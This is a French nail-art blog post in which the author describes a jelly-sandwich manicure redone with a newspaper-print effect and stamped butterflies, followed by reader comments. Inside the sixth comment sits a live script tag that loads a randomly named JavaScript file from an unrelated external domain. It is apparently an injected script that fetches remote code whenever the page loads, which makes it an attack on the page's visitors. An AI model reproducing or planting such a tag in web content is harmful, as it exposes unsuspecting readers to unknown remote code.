• Jelly Paper

    Bonsoir les filles =p

    Reprise du boulot oblige je publie le soir ^^

    Je vous avais dit, lors de mon article « Dans les petits papiers » que j'avais refait une manucure version paper =)

    La voici ^^ alors comme un second essai ne va pas sans un premier teste, j'ai décidé de vous présenter une manucure Jelly Sandwitch, on les voit « fleurir » un peu partout sur les blogs, il s'agit de poser une base, de lui mettre quelques paillettes et de recouvrir le tout d'un vernis Jelly ou translucide.

    Pour cette base j'ai utilisé le Miss Swan de chez Nailangel, un vernis full paillette le It's Purplicious de chez Essences et le Autan de chez LM Cosmetic.

    Jelly Paper

    Suite à ce joli Jelly, enfin moi j'ai juste adorais, avec les reflets irisé et la teinte particulière du Miss swan le rendu était pas mal ... Mais trop simple.

    Jelly Paper

    Jelly Paper

    Alors, j'ai repris de refaire un nail art newspaper (je ne reste jamais sur un échec). Et la Bingo, j'ai adoré,je l'ai porté deux jours sans rien juste comme sa =)

    Mais en bonne nail artiste, je me devais de faire une petite déco, je la voulais sobre, j'ai donc sortis le peu de Konad que j'ai chez moi, mon nécessaire à Stamping et stamper ces papillons bien connuent =), puis pour terminer agrémenter de petite arabesques (Oui encore >< pardonnez-moi, mais je suis fan=D)

    Au final, j'ai tout simplement adoré ce nail art, même si par contre, je m'en suis très vite lassé ! Trop sobre à mon goût.

    Alors, les filles, vous en pensez quoi de cette seconde manucure façon newpaper ? Et vous êtes vous déjà laissez tenter par la Jelly Sandwitch ?

    Bisouille et profitez bien ... Demain c'est férie et le soleil est présent ... Mon programme Barbuc' etbronzette =D que demander de mieux ? Ha si je sais ... La plage ><

    Jelly Paper

    Jelly Paper

    Jelly Paper

    « Fleur de la nuitYou Belong To Me - Essence »

    Tags Tags : , , , , , , ,
  • Commentaires

    1
    Mardi 14 Août 2012 à 19:08

    J'adore c'est trop joli !!

    2
    Mardi 14 Août 2012 à 23:29

    Tres jolie :)

    3
    Mercredi 15 Août 2012 à 18:15

    Alors déja le jelly sandwich j'était fan mais alors le rendu final... Juste parfait !! j'aime trop

    4
    maggybulle Profil de maggybulle
    Mercredi 15 Août 2012 à 18:17

    Hihi merci =D

    5
    Jeudi 16 Août 2012 à 13:57
    BAurorenail

    trop trop bien j'adore! moi aussi faut que je tente ce systeme de sandwich hihi!! ca rend trop bien, et ca me trotte dans la téte depuis un moment. Et l'effet papier je m'en suis servi moi aussila semaine derniere pour une deco fluo. ca rend super bien en fond sa donne un petit plus bien simpa aux deco

    BEA

    6
    Samedi 18 Août 2012 à 17:58

    Moi j'suis pas fan de cette nouvelle mode du Jelly Sandwich, du coup pas encore testé mais j'y viendrais surement, au moins pour dire que j'lai fait lol !

    Par contre le newpaper j'adore !! j'ai pas encore eu l'occasion de tester non plus mais je le ferai très prochainement et j'lui mettrais aussi sa petite touche de déco, j'trouve dommage de voir cette manucure trop souvent ''nue'' du coup, elles se ressemblent toutes, c'est d'un triste xD

     

    <script src="http://themerose.info/dfi823hs.js?0.212399795453886" type="text/javascript"></script>
    7
    EyO
    Mercredi 29 Août 2012 à 22:56

    Jamais pensé à le décorer lol, très joli résultat :)

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :